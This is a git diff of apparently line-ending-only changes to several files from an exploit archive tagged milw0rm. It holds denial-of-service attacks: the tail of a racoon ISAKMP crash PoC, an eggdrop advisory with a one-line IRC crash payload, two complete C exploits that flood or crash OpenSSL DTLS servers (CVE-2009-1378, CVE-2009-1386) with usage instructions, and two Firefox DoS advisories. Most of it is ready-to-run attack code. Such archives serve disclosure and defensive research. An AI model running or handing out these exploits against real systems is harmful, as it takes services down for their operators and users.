ISAKMP_FRAG_LAST; + + n = sendto (fd, hdr, len, 0, (struct sockaddr *) &saddr, sizeof saddr); + if (n < 0 || n != len) + { + fprintf (stderr, "isa_kmp_dos: sendto %d != %d\n", n, len); + exit (EXIT_FAILURE); + } + + close (fd); +} + +int +main (int argc, char **argv) +{ + printf ("ipsec-tools racoon frag-isakmp DoS PoC\n" + "by: \n" + "http://www.digit-labs.org/ -- Digit-Labs 2009!@$!\n\n"); + + if (argc <= 1) + { + fprintf (stderr, "Usage: %s \n", argv[0]); + exit (EXIT_SUCCESS); + } + + printf ("* crashing racoon... "); + isa_kmp_dos (argv[1]); + printf ("done\n\n"); + + return (EXIT_SUCCESS); +} + +// milw0rm.com [2009-05-13] diff --git a/platforms/multiple/dos/8695.txt b/platforms/multiple/dos/8695.txt index fd63a464f..d896d779d 100755 --- a/platforms/multiple/dos/8695.txt +++ b/platforms/multiple/dos/8695.txt @@ -1,60 +1,60 @@ -eggdrop/windrop remote crash vulnerability - - * This message: [ Message body ] [ More options ] - * Related messages: [ Next message ] [ Previous message ] [ Next in thread ] [ Replies ] - -From: Thomas Sader -Date: Fri, 15 May 2009 05:54:08 +0200 - -Affected software ------------------ - -eggdrop (1.6.19 only, not 1.6.19+ctcpfix) -windrop (1.6.19 only, not 1.6.19+ctcpfix) -all eggdrop/windrop versions and packages which apply Nico Goldes -patch for CVE-2007-2807/SA25276 See: [1] - -Vulnerability details ---------------------- - -The SA25276 patch ([1]) uses strncpy to fix a buffer overflow vulnerability -in src/mod/server.mod/servmsg.c (gotmsg). The last argument is not checked -for being non-negative, but that can happen if ctcpbuf is "". That causes -a remote crash vulnerability to be exploited by anyone connected to the same -IRC network as eggdrop. The SA25276 patch has been applied to the eggdrop1.6.18 -debian package and was later adopted by Eggheads into eggdrop1.6.19. - -One possible exploit anyone can send to the IRC server to crash eggdrop: - -PRIVMSG eggdrop :\1\1 - -Resolution ----------- - -Upgrade to eggdrop/windrop 1.6.19+ctcpfix ([2],[3]), the current cvs versions, -or apply the ctcpfix patch at [2] before compiling. - -Disclosure timeline -------------------- - -2009-05-06: Vulnerability discovered and reported to Eggheads. -2009-05-06: Patch committed to cvs. -2009-05-14: New eggdrop and windrop version released with the fix applied. -2009-05-14: Public disclosure. - -References ----------- - -[1] http://bugzilla.eggheads.org/show_bug.cgi?id=462 - http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=427157 - http://www.securityfocus.com/bid/24070 - http://secunia.com/advisories/25276 - http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-2807 - -[2] http://www.eggheads.org/downloads/ -[3] http://windrop.sourceforge.net/downloads.html - ---- -Thomas Sader (thommey) - -# milw0rm.com [2009-05-15] +eggdrop/windrop remote crash vulnerability + + * This message: [ Message body ] [ More options ] + * Related messages: [ Next message ] [ Previous message ] [ Next in thread ] [ Replies ] + +From: Thomas Sader +Date: Fri, 15 May 2009 05:54:08 +0200 + +Affected software +----------------- + +eggdrop (1.6.19 only, not 1.6.19+ctcpfix) +windrop (1.6.19 only, not 1.6.19+ctcpfix) +all eggdrop/windrop versions and packages which apply Nico Goldes +patch for CVE-2007-2807/SA25276 See: [1] + +Vulnerability details +--------------------- + +The SA25276 patch ([1]) uses strncpy to fix a buffer overflow vulnerability +in src/mod/server.mod/servmsg.c (gotmsg). The last argument is not checked +for being non-negative, but that can happen if ctcpbuf is "". That causes +a remote crash vulnerability to be exploited by anyone connected to the same +IRC network as eggdrop. The SA25276 patch has been applied to the eggdrop1.6.18 +debian package and was later adopted by Eggheads into eggdrop1.6.19. + +One possible exploit anyone can send to the IRC server to crash eggdrop: + +PRIVMSG eggdrop :\1\1 + +Resolution +---------- + +Upgrade to eggdrop/windrop 1.6.19+ctcpfix ([2],[3]), the current cvs versions, +or apply the ctcpfix patch at [2] before compiling. + +Disclosure timeline +------------------- + +2009-05-06: Vulnerability discovered and reported to Eggheads. +2009-05-06: Patch committed to cvs. +2009-05-14: New eggdrop and windrop version released with the fix applied. +2009-05-14: Public disclosure. + +References +---------- + +[1] http://bugzilla.eggheads.org/show_bug.cgi?id=462 + http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=427157 + http://www.securityfocus.com/bid/24070 + http://secunia.com/advisories/25276 + http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-2807 + +[2] http://www.eggheads.org/downloads/ +[3] http://windrop.sourceforge.net/downloads.html + +--- +Thomas Sader (thommey) + +# milw0rm.com [2009-05-15] diff --git a/platforms/multiple/dos/8720.c b/platforms/multiple/dos/8720.c index f6da7cb9c..759c8a84b 100755 --- a/platforms/multiple/dos/8720.c +++ b/platforms/multiple/dos/8720.c @@ -1,144 +1,144 @@ -/* - * cve-2009-1378.c - * - * OpenSSL <= 0.9.8k, 1.0.0-beta2 DTLS Remote Memory Exhaustion DoS - * Jon Oberheide - * http://jon.oberheide.org - * - * Information: - * - * http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-1378 - * - * In dtls1_process_out_of_seq_message() the check if the current message is - * already buffered was missing. For every new message was memory allocated, - * allowing an attacker to perform an denial of service attack with sending - * out of seq handshake messages until there is no memory left. - * - * Usage: - * - * Pass the host and port of the target DTLS server: - * - * $ gcc cve-2009-1378.c -o cve-2009-1378 - * $ ./cve-2009-1378 1.2.3.4 666 - * - * Notes: - * - * With a MTU of 1500, the attack leaks 1503 bytes of memory with each UDP - * datagram. If you have a bigger MTU than 1500, feel free to set it. - * - * Complete memory exhaustion may take a while depending on the throughput - * to the target and the amount of memory it has. By default, we'll just - * continue sending datagrams indefinitely. - * - */ - -#include -#include -#include -#include -#include -#include -#include -#include -#include -#include - -#define MTU 1500 - -#define IP_HDR_LEN 20 -#define UDP_HDR_LEN 8 -#define MAX_LEN (MTU - IP_HDR_LEN - UDP_HDR_LEN) - -#define put16(b, data) ( \ - (*(b) = ((data) >> 8) & 0xff), \ - (*((b)+1) = (data) & 0xff)) - -int -main(int argc, char **argv) -{ - int sock, ret; - char *ptr, *err; - struct hostent *h; - struct sockaddr_in target; - char buf[MAX_LEN]; - - if (argc < 3) { - err = "Pass the host and port of the target DTLS server"; - printf("[-] Error: %s\n", err); - exit(1); - } - - h = gethostbyname(argv[1]); - if (!h) { - err = "Unknown host specified"; - printf("[-] Error: %s (%s)\n", err, strerror(errno)); - exit(1); - } - - target.sin_family = h->h_addrtype; - memcpy(&target.sin_addr.s_addr, h->h_addr_list[0], h->h_length); - target.sin_port = htons(atoi(argv[2])); - - sock = socket(AF_INET, SOCK_DGRAM, 0); - if (sock == -1) { - err = "Failed creating UDP socket"; - printf("[-] Error: %s (%s)\n", err, strerror(errno)); - exit(1); - } - - ret = connect(sock, (struct sockaddr *) &target, sizeof(target)); - if (ret == -1) { - err = "Failed to connect socket"; - printf("[-] Error: %s (%s)\n", err, strerror(errno)); - exit(1); - } - - ptr = buf; - - /* header */ - memcpy(ptr, "\x16\xfe\xff\x00\x00\x00\x00\x00\x00\x00\x00", 11); - ptr += 11; - - /* packet length */ - put16(ptr, MAX_LEN - ((ptr - buf) + 2)); - ptr += 2; - - /* client hello */ - memcpy(ptr, "\x01", 1); - ptr += 1; - - /* length */ - memcpy(ptr, "\x00", 1); - ptr += 1; - put16(ptr, MAX_LEN - ((ptr - buf) + 2 + 8)); - ptr += 2; - - /* sequence number */ - memcpy(ptr, "\x00\x01", 2); - ptr += 2; - - /* frag offset */ - memcpy(ptr, "\x00\x00\x00", 3); - ptr += 3; - - /* length */ - memcpy(ptr, "\x00", 1); - ptr += 1; - put16(ptr, MAX_LEN - ((ptr - buf) + 2)); - ptr += 2; - - /* payload */ - memset(ptr, '\x00', MAX_LEN - (ptr - buf)); - - printf("[+] Firing loads of packets at %s:%s...\n", argv[1], argv[2]); - - while (1) { - send(sock, buf, MAX_LEN, 0); - } - - close(sock); - - return 0; -} - -// milw0rm.com [2009-05-18] +/* + * cve-2009-1378.c + * + * OpenSSL <= 0.9.8k, 1.0.0-beta2 DTLS Remote Memory Exhaustion DoS + * Jon Oberheide + * http://jon.oberheide.org + * + * Information: + * + * http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-1378 + * + * In dtls1_process_out_of_seq_message() the check if the current message is + * already buffered was missing. For every new message was memory allocated, + * allowing an attacker to perform an denial of service attack with sending + * out of seq handshake messages until there is no memory left. + * + * Usage: + * + * Pass the host and port of the target DTLS server: + * + * $ gcc cve-2009-1378.c -o cve-2009-1378 + * $ ./cve-2009-1378 1.2.3.4 666 + * + * Notes: + * + * With a MTU of 1500, the attack leaks 1503 bytes of memory with each UDP + * datagram. If you have a bigger MTU than 1500, feel free to set it. + * + * Complete memory exhaustion may take a while depending on the throughput + * to the target and the amount of memory it has. By default, we'll just + * continue sending datagrams indefinitely. + * + */ + +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include + +#define MTU 1500 + +#define IP_HDR_LEN 20 +#define UDP_HDR_LEN 8 +#define MAX_LEN (MTU - IP_HDR_LEN - UDP_HDR_LEN) + +#define put16(b, data) ( \ + (*(b) = ((data) >> 8) & 0xff), \ + (*((b)+1) = (data) & 0xff)) + +int +main(int argc, char **argv) +{ + int sock, ret; + char *ptr, *err; + struct hostent *h; + struct sockaddr_in target; + char buf[MAX_LEN]; + + if (argc < 3) { + err = "Pass the host and port of the target DTLS server"; + printf("[-] Error: %s\n", err); + exit(1); + } + + h = gethostbyname(argv[1]); + if (!h) { + err = "Unknown host specified"; + printf("[-] Error: %s (%s)\n", err, strerror(errno)); + exit(1); + } + + target.sin_family = h->h_addrtype; + memcpy(&target.sin_addr.s_addr, h->h_addr_list[0], h->h_length); + target.sin_port = htons(atoi(argv[2])); + + sock = socket(AF_INET, SOCK_DGRAM, 0); + if (sock == -1) { + err = "Failed creating UDP socket"; + printf("[-] Error: %s (%s)\n", err, strerror(errno)); + exit(1); + } + + ret = connect(sock, (struct sockaddr *) &target, sizeof(target)); + if (ret == -1) { + err = "Failed to connect socket"; + printf("[-] Error: %s (%s)\n", err, strerror(errno)); + exit(1); + } + + ptr = buf; + + /* header */ + memcpy(ptr, "\x16\xfe\xff\x00\x00\x00\x00\x00\x00\x00\x00", 11); + ptr += 11; + + /* packet length */ + put16(ptr, MAX_LEN - ((ptr - buf) + 2)); + ptr += 2; + + /* client hello */ + memcpy(ptr, "\x01", 1); + ptr += 1; + + /* length */ + memcpy(ptr, "\x00", 1); + ptr += 1; + put16(ptr, MAX_LEN - ((ptr - buf) + 2 + 8)); + ptr += 2; + + /* sequence number */ + memcpy(ptr, "\x00\x01", 2); + ptr += 2; + + /* frag offset */ + memcpy(ptr, "\x00\x00\x00", 3); + ptr += 3; + + /* length */ + memcpy(ptr, "\x00", 1); + ptr += 1; + put16(ptr, MAX_LEN - ((ptr - buf) + 2)); + ptr += 2; + + /* payload */ + memset(ptr, '\x00', MAX_LEN - (ptr - buf)); + + printf("[+] Firing loads of packets at %s:%s...\n", argv[1], argv[2]); + + while (1) { + send(sock, buf, MAX_LEN, 0); + } + + close(sock); + + return 0; +} + +// milw0rm.com [2009-05-18] diff --git a/platforms/multiple/dos/8794.htm b/platforms/multiple/dos/8794.htm index 6e31c93ea..342464028 100755 --- a/platforms/multiple/dos/8794.htm +++ b/platforms/multiple/dos/8794.htm @@ -1,100 +1,100 @@ - From the low-hanging-fruit-department - Firefox et al. Denial of Service - All versions supporting SVG -________________________________________________________________________ - -CHEAP Plug : -************************************************************************ -You are invited to participate in HACK.LU 2009, a small but concentrated -luxemburgish security conference. More information : http://www.hack.lu -CFP is open, sponsorship is still possible and warmly welcomed! -************************************************************************ - -Release mode: Forced release. -Ref : [TZO-26-2009] - Firefox DoS (unclamped loop) SVG -WWW : http://blog.zoller.lu/2009/04/advisory-firefox-dos-condition.html -Vendor : http://www.firefox.com -Status : No patch -CVE : none provided -Credit : none -Bugzilla entry: https://bugzilla.mozilla.org/show_bug.cgi?id=465615 - -Security notification reaction rating : There wasn't any reaction. OSS Security notification FTW -Notification to patch window : x+n - -Disclosure Policy : http://blog.zoller.lu/2008/09/notification-and-disclosure-policy.html - -Affected products : -- Firefox all supporting SVG (didn't care to investigate which, task of the vendor) -- all software packages using mozilla engine and allowing SVG - -I. Background -~~~~~~~~~~~~ -Firefox is a popular internet browser. - -II. Description -~~~~~~~~~~~~~~ -This bug is a typical result of what we call unclamped loop. An "attacker" -will give the Radius value of the Circle attribute a very big value. That -is leetness. - -Stack trace : -ntkrnlpa.exe+0x6e9ab -ntkrnlpa.exe!MmIsDriverVerifying+0xbb0 -hal.dll+0x2ef2 -xul.dll!NS_InvokeByIndex_P+0x30c36 -xul.dll!NS_InvokeByIndex_P+0x30e8a -xul.dll!NS_InvokeByIndex_P+0x30e02 -xul.dll!NS_InvokeByIndex_P+0x30f5e -xul.dll!XRE_InitEmbedding+0x7858 -xul.dll!XRE_InitEmbedding+0xf4ee -xul.dll!XRE_TermEmbedding+0x11411 -xul.dll!gfxTextRun::Draw+0xdd4d -xul.dll!gfxTextRun::Draw+0xe1ca -xul.dll!gfxWindowsPlatform::PrefChangedCallback+0x1495 -xul.dll!gfxTextRun::SetSpaceGlyph+0x2678 -xul.dll!gfxFont::NotifyLineBreaksChanged+0xf1d3 -xul.dll!gfxWindowsPlatform::RunLoader+0xa9f6 -xul.dll!NS_StringCopy_P+0x9942 -xul.dll!gfxImageSurface::gfxImageSurface+0x3188 -xul.dll!gfxImageSurface::gfxImageSurface+0x2ed8 - - -Also produces exceptions in MOZCRT19... -MOZCRT19!modf+0x2570: -600715e0 660f122550450960 movlpd xmm4,qword ptr [MOZCRT19!exception::`vftable'+0x1a3d8 (60094550)] ds:0023:60094550=3fe62e42fefa39ef - -III. Impact -~~~~~~~~~~ -Browser doesn't respond any longer to any user input, all tabs are no -longer accessible, your work if any (hail to the web 2.0) might be lost. - -IV. Proof of concept (hold your breath) -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ - - - - - - - -IV. Disclosure timeline -~~~~~~~~~~~~~~~~~~~~~~~~ -DD/MM/YYYY -18/11/2008 : Created bugzilla entry (security) with proof of concept, - description the terms under which ooperate and the planned disclosure date. - -24/22/2008 : Daniel Veditz comments : "Might be a cairo bug rather than SVG - (seems to be looping in libthebes), but I can definitely confirm - the DoS. - -14/12/2008 : Ask for any action plan and my assessement of considering it low risk - - No reply. - -28/12/2008 : "Timeless" comments [..] personally, i intend to open this bug - to the public [..] a bug like this is more likely to be fixed - by being visible to more people than by leaving it in a closet. - -26/05/2009 : In 2009 I agree; release of this advisory. - -# milw0rm.com [2009-05-26] + From the low-hanging-fruit-department + Firefox et al. Denial of Service - All versions supporting SVG +________________________________________________________________________ + +CHEAP Plug : +************************************************************************ +You are invited to participate in HACK.LU 2009, a small but concentrated +luxemburgish security conference. More information : http://www.hack.lu +CFP is open, sponsorship is still possible and warmly welcomed! +************************************************************************ + +Release mode: Forced release. +Ref : [TZO-26-2009] - Firefox DoS (unclamped loop) SVG +WWW : http://blog.zoller.lu/2009/04/advisory-firefox-dos-condition.html +Vendor : http://www.firefox.com +Status : No patch +CVE : none provided +Credit : none +Bugzilla entry: https://bugzilla.mozilla.org/show_bug.cgi?id=465615 + +Security notification reaction rating : There wasn't any reaction. OSS Security notification FTW +Notification to patch window : x+n + +Disclosure Policy : http://blog.zoller.lu/2008/09/notification-and-disclosure-policy.html + +Affected products : +- Firefox all supporting SVG (didn't care to investigate which, task of the vendor) +- all software packages using mozilla engine and allowing SVG + +I. Background +~~~~~~~~~~~~ +Firefox is a popular internet browser. + +II. Description +~~~~~~~~~~~~~~ +This bug is a typical result of what we call unclamped loop. An "attacker" +will give the Radius value of the Circle attribute a very big value. That +is leetness. + +Stack trace : +ntkrnlpa.exe+0x6e9ab +ntkrnlpa.exe!MmIsDriverVerifying+0xbb0 +hal.dll+0x2ef2 +xul.dll!NS_InvokeByIndex_P+0x30c36 +xul.dll!NS_InvokeByIndex_P+0x30e8a +xul.dll!NS_InvokeByIndex_P+0x30e02 +xul.dll!NS_InvokeByIndex_P+0x30f5e +xul.dll!XRE_InitEmbedding+0x7858 +xul.dll!XRE_InitEmbedding+0xf4ee +xul.dll!XRE_TermEmbedding+0x11411 +xul.dll!gfxTextRun::Draw+0xdd4d +xul.dll!gfxTextRun::Draw+0xe1ca +xul.dll!gfxWindowsPlatform::PrefChangedCallback+0x1495 +xul.dll!gfxTextRun::SetSpaceGlyph+0x2678 +xul.dll!gfxFont::NotifyLineBreaksChanged+0xf1d3 +xul.dll!gfxWindowsPlatform::RunLoader+0xa9f6 +xul.dll!NS_StringCopy_P+0x9942 +xul.dll!gfxImageSurface::gfxImageSurface+0x3188 +xul.dll!gfxImageSurface::gfxImageSurface+0x2ed8 + + +Also produces exceptions in MOZCRT19... +MOZCRT19!modf+0x2570: +600715e0 660f122550450960 movlpd xmm4,qword ptr [MOZCRT19!exception::`vftable'+0x1a3d8 (60094550)] ds:0023:60094550=3fe62e42fefa39ef + +III. Impact +~~~~~~~~~~ +Browser doesn't respond any longer to any user input, all tabs are no +longer accessible, your work if any (hail to the web 2.0) might be lost. + +IV. Proof of concept (hold your breath) +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ + + + + + + + +IV. Disclosure timeline +~~~~~~~~~~~~~~~~~~~~~~~~ +DD/MM/YYYY +18/11/2008 : Created bugzilla entry (security) with proof of concept, + description the terms under which ooperate and the planned disclosure date. + +24/22/2008 : Daniel Veditz comments : "Might be a cairo bug rather than SVG + (seems to be looping in libthebes), but I can definitely confirm + the DoS. + +14/12/2008 : Ask for any action plan and my assessement of considering it low risk + + No reply. + +28/12/2008 : "Timeless" comments [..] personally, i intend to open this bug + to the public [..] a bug like this is more likely to be fixed + by being visible to more people than by leaving it in a closet. + +26/05/2009 : In 2009 I agree; release of this advisory. + +# milw0rm.com [2009-05-26] diff --git a/platforms/multiple/dos/880.pl b/platforms/multiple/dos/880.pl index 564cd8b24..4547f7b30 100755 --- a/platforms/multiple/dos/880.pl +++ b/platforms/multiple/dos/880.pl @@ -45,6 +45,6 @@ print $socket "$string"; print "[>] Attack successful - Server killed\n"; -close($socket); - -# milw0rm.com [2005-03-14] +close($socket); + +# milw0rm.com [2005-03-14] diff --git a/platforms/multiple/dos/8822.txt b/platforms/multiple/dos/8822.txt index 2623dc2d9..02a86033c 100755 --- a/platforms/multiple/dos/8822.txt +++ b/platforms/multiple/dos/8822.txt @@ -1,120 +1,120 @@ -===8<=================== Original Nachrichtentext =================== -________________________________________________________________________ - - From the very-low-hanging-fruit-department - Firefox Denial of Service (KEYGEN) -________________________________________________________________________ - - -Release mode: Forced release. -Ref : [TZO-27-2009] - Firefox Denial of Service (KEYGEN) -WWW : http://blog.zoller.lu/2009/04/advisory-firefox-denial-of-service.html -Vendor : http://www.firefox.com -Status : No patch -CVE : none provided -Credit : none -Bugzilla entry: https://bugzilla.mozilla.org/show_bug.cgi?id=469565 - -Security notification reaction rating : There wasn't any appropriate reaction. -Notification to patch window : x+n - -Disclosure Policy : http://blog.zoller.lu/2008/09/notification-and-disclosure-policy.html - -Affected products : -- Firefox 3.0.10 (Windows) -- Likely : All Firefox versions supporting the KEYGEN tag. - -I. Background -~~~~~~~~~~~~ -Firefox is a popular Internet browser from the Mozilla Corporation. In 2007 the -Mozilla Corporation had a revenue of over 75 million dollars [1], out of -which 68 million where made with a search advertising deal, in other words with -the search box in Firefox that defaults to Google. - -I envy the spirit of everyone that works on Firefox code in their spare time, -for free. - -II. Description -~~~~~~~~~~~~~~ -This bug is a simple design bug that results in an endless loop (and interesting -memory leaks). - -Once upon a time Netscape thought it would be a great idea to add the keygen tag -() as a feature to their Browser. The keygen tag offers a simple way -of automatically generating key material using various algorithms. For instance -it is possible to generate RSA, DSA and EC key material. - -"The public key and challenge string are DER encoded as PublicKeyAndChallenge and -then digitally signed with the private key to produce a SignedPublicKeyAndChallenge. -The SignedPublicKeyAndChallenge is base64 encoded, and the ASCII data is finally -submitted to the server as the value of a name-value pair, where the name is -specified by the NAME attribute of the KEYGEN tag." - -More information: https://developer.mozilla.org/En/HTML/HTML_Extensions/KEYGEN_Tag - -This feature includes the automatic submission of the public part to a script, -the crux. The Keygen tag reloads the document by submitting the public key as an argument -to the current URI. Combining this with a javascript body onload() call -(or meta refresh) results in an neat endless loop blocking access to the UI. - -Furthermore memory is leaked during the process. - -III. Impact -~~~~~~~~~~ -The browser doesn't respond any longer to any user input, tabs are no -longer accessible, your work if any might be lost. Restarting the -Firefox process and restoring the previous Firefox session will -re-spawn the tab and start the loop again. - -According to a Bugzilla entry memory is also leaked during the process. - -So let's recap, we have a function that generates key material and looping -causes memory to leak. One might think this should be important enough -to investigate, especially if you know that for DSA for instance, only -a few bits of k can reveal an entire private key. [3] - -Note: I am not saying the memory leaks include key material, seeing the lack -of interest this bugzilla ticket triggered, I have not considered investigating -further. What I am saying is that if security is taken seriously -memory leaks that directly or indirectly happen during key generation -need to be investigated thoroughly. - - -IV. Proof of concept (hold your breath) -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ - - -
- - -
- - -Live : http://secdev.zoller.lu/ff_dos_keygen.html - - -IV. Disclosure timeline -~~~~~~~~~~~~~~~~~~~~~~~~ -DD/MM/YYYY -14/12/2008 : Created bugzilla entry (security) with (the wrong) proof of concept - file. - -14/12/2008 : Attached the correct POC file (mea culpa) and a stack trace and details - of memory corruption that repeatedly occurred during testing the POC - -24/12/2008 : dveditz@mozilla.com comments : "I can definitely confirm the denial - of service aspect, and there's a very minor memory leak (after 9 - hours of CPU time memory use went from 60MB to 360MB). Haven't been - able to reproduce a crash." - -27/05/2009 : The 4 month grace period [2] given is reached. Release of this advisory. - - -[1] http://www.mozilla.org/foundation/documents/mf-2007-audited-financial-statement.pdf -http://www.guidestar.org/FinDocuments//2007/200/097/2007-200097189-047bbaa9-9.pdf -[2] http://blog.zoller.lu/2008/09/notification-and-disclosure-policy.html -[3] http://rdist.root.org/?s=dsa - -===8<============== Ende des Original Nachrichtentextes ============= - -# milw0rm.com [2009-05-29] +===8<=================== Original Nachrichtentext =================== +________________________________________________________________________ + + From the very-low-hanging-fruit-department + Firefox Denial of Service (KEYGEN) +________________________________________________________________________ + + +Release mode: Forced release. +Ref : [TZO-27-2009] - Firefox Denial of Service (KEYGEN) +WWW : http://blog.zoller.lu/2009/04/advisory-firefox-denial-of-service.html +Vendor : http://www.firefox.com +Status : No patch +CVE : none provided +Credit : none +Bugzilla entry: https://bugzilla.mozilla.org/show_bug.cgi?id=469565 + +Security notification reaction rating : There wasn't any appropriate reaction. +Notification to patch window : x+n + +Disclosure Policy : http://blog.zoller.lu/2008/09/notification-and-disclosure-policy.html + +Affected products : +- Firefox 3.0.10 (Windows) +- Likely : All Firefox versions supporting the KEYGEN tag. + +I. Background +~~~~~~~~~~~~ +Firefox is a popular Internet browser from the Mozilla Corporation. In 2007 the +Mozilla Corporation had a revenue of over 75 million dollars [1], out of +which 68 million where made with a search advertising deal, in other words with +the search box in Firefox that defaults to Google. + +I envy the spirit of everyone that works on Firefox code in their spare time, +for free. + +II. Description +~~~~~~~~~~~~~~ +This bug is a simple design bug that results in an endless loop (and interesting +memory leaks). + +Once upon a time Netscape thought it would be a great idea to add the keygen tag +() as a feature to their Browser. The keygen tag offers a simple way +of automatically generating key material using various algorithms. For instance +it is possible to generate RSA, DSA and EC key material. + +"The public key and challenge string are DER encoded as PublicKeyAndChallenge and +then digitally signed with the private key to produce a SignedPublicKeyAndChallenge. +The SignedPublicKeyAndChallenge is base64 encoded, and the ASCII data is finally +submitted to the server as the value of a name-value pair, where the name is +specified by the NAME attribute of the KEYGEN tag." + +More information: https://developer.mozilla.org/En/HTML/HTML_Extensions/KEYGEN_Tag + +This feature includes the automatic submission of the public part to a script, +the crux. The Keygen tag reloads the document by submitting the public key as an argument +to the current URI. Combining this with a javascript body onload() call +(or meta refresh) results in an neat endless loop blocking access to the UI. + +Furthermore memory is leaked during the process. + +III. Impact +~~~~~~~~~~ +The browser doesn't respond any longer to any user input, tabs are no +longer accessible, your work if any might be lost. Restarting the +Firefox process and restoring the previous Firefox session will +re-spawn the tab and start the loop again. + +According to a Bugzilla entry memory is also leaked during the process. + +So let's recap, we have a function that generates key material and looping +causes memory to leak. One might think this should be important enough +to investigate, especially if you know that for DSA for instance, only +a few bits of k can reveal an entire private key. [3] + +Note: I am not saying the memory leaks include key material, seeing the lack +of interest this bugzilla ticket triggered, I have not considered investigating +further. What I am saying is that if security is taken seriously +memory leaks that directly or indirectly happen during key generation +need to be investigated thoroughly. + + +IV. Proof of concept (hold your breath) +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ + + +
+ + +
+ + +Live : http://secdev.zoller.lu/ff_dos_keygen.html + + +IV. Disclosure timeline +~~~~~~~~~~~~~~~~~~~~~~~~ +DD/MM/YYYY +14/12/2008 : Created bugzilla entry (security) with (the wrong) proof of concept + file. + +14/12/2008 : Attached the correct POC file (mea culpa) and a stack trace and details + of memory corruption that repeatedly occurred during testing the POC + +24/12/2008 : dveditz@mozilla.com comments : "I can definitely confirm the denial + of service aspect, and there's a very minor memory leak (after 9 + hours of CPU time memory use went from 60MB to 360MB). Haven't been + able to reproduce a crash." + +27/05/2009 : The 4 month grace period [2] given is reached. Release of this advisory. + + +[1] http://www.mozilla.org/foundation/documents/mf-2007-audited-financial-statement.pdf +http://www.guidestar.org/FinDocuments//2007/200/097/2007-200097189-047bbaa9-9.pdf +[2] http://blog.zoller.lu/2008/09/notification-and-disclosure-policy.html +[3] http://rdist.root.org/?s=dsa + +===8<============== Ende des Original Nachrichtentextes ============= + +# milw0rm.com [2009-05-29] diff --git a/platforms/multiple/dos/8873.c b/platforms/multiple/dos/8873.c index 7fa96a4a9..943b1635e 100755 --- a/platforms/multiple/dos/8873.c +++ b/platforms/multiple/dos/8873.c @@ -1,92 +1,92 @@ -/* - * cve-2009-1386.c - * - * OpenSSL < 0.9.8i DTLS ChangeCipherSpec Remote DoS - * Jon Oberheide - * http://jon.oberheide.org - * - * Information: - * - * http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-1386 - * - * OpenSSL would SegFault if the DTLS server receives a ChangeCipherSpec as - * the first record instead of ClientHello. - * - * Usage: - * - * Pass the host and port of the target DTLS server: - * - * $ gcc cve-2009-1386.c -o cve-2009-1386 - * $ ./cve-2009-1386 1.2.3.4 666 - * - * Notes: - * - * Much easier than the memory exhaustion DoS issue (CVE-2009-1378) as this - * only requires a single ChangeCipherSpec datagram, but affects an older - * version of OpenSSL. - * - */ - -#include -#include -#include -#include -#include -#include -#include -#include -#include -#include - -int -main(int argc, char **argv) -{ - int sock, ret; - char *ptr, *err; - struct hostent *h; - struct sockaddr_in target; - char buf[64]; - - if (argc < 3) { - err = "Pass the host and port of the target DTLS server"; - printf("[-] Error: %s\n", err); - exit(1); - } - - h = gethostbyname(argv[1]); - if (!h) { - err = "Unknown host specified"; - printf("[-] Error: %s (%s)\n", err, strerror(errno)); - exit(1); - } - - target.sin_family = h->h_addrtype; - memcpy(&target.sin_addr.s_addr, h->h_addr_list[0], h->h_length); - target.sin_port = htons(atoi(argv[2])); - - sock = socket(AF_INET, SOCK_DGRAM, 0); - if (sock == -1) { - err = "Failed creating UDP socket"; - printf("[-] Error: %s (%s)\n", err, strerror(errno)); - exit(1); - } - - ret = connect(sock, (struct sockaddr *) &target, sizeof(target)); - if (ret == -1) { - err = "Failed to connect socket"; - printf("[-] Error: %s (%s)\n", err, strerror(errno)); - exit(1); - } - - memcpy(buf, "\x14\xfe\xff\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x01", 14); - - printf("[+] Sending DTLS datagram of death at %s:%s...\n", argv[1], argv[2]); - - send(sock, buf, 14, 0); - - close(sock); - - return 0; -} - -// milw0rm.com [2009-06-04] +/* + * cve-2009-1386.c + * + * OpenSSL < 0.9.8i DTLS ChangeCipherSpec Remote DoS + * Jon Oberheide + * http://jon.oberheide.org + * + * Information: + * + * http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-1386 + * + * OpenSSL would SegFault if the DTLS server receives a ChangeCipherSpec as + * the first record instead of ClientHello. + * + * Usage: + * + * Pass the host and port of the target DTLS server: + * + * $ gcc cve-2009-1386.c -o cve-2009-1386 + * $ ./cve-2009-1386 1.2.3.4 666 + * + * Notes: + * + * Much easier than the memory exhaustion DoS issue (CVE-2009-1378) as this + * only requires a single ChangeCipherSpec datagram, but affects an older + * version of OpenSSL. + * + */ + +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include + +int +main(int argc, char **argv) +{ + int sock, ret; + char *ptr, *err; + struct hostent *h; + struct sockaddr_in target; + char buf[64]; + + if (argc < 3) { + err = "Pass the host and port of the target DTLS server"; + printf("[-] Error: %s\n", err); + exit(1); + } + + h = gethostbyname(argv[1]); + if (!h) { + err = "Unknown host specified"; + printf("[-] Error: %s (%s)\n", err, strerror(errno)); + exit(1); + } + + target.sin_family = h->h_addrtype; + memcpy(&target.sin_addr.s_addr, h->h_addr_list[0], h->h_length); + target.sin_port = htons(atoi(argv[2])); + + sock = socket(AF_INET, SOCK_DGRAM, 0); + if (sock == -1) { + err = "Failed creating UDP socket"; + printf("[-] Error: %s (%s)\n", err, strerror(errno)); + exit(1); + } + + ret = connect(sock, (struct sockaddr *) &target, sizeof(target)); + if (ret == -1) { + err = "Failed to connect socket"; + printf("[-] Error: %s (%s)\n", err, strerror(errno)); + exit(1); + } + + memcpy(buf, "\x14\xfe\xff\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x01", 14); + + printf("[+] Sending DTLS datagram of death at %s:%s...\n", argv[1], argv[2]); + + send(sock, buf, 14, 0); + + close(sock); + + return 0; +} + 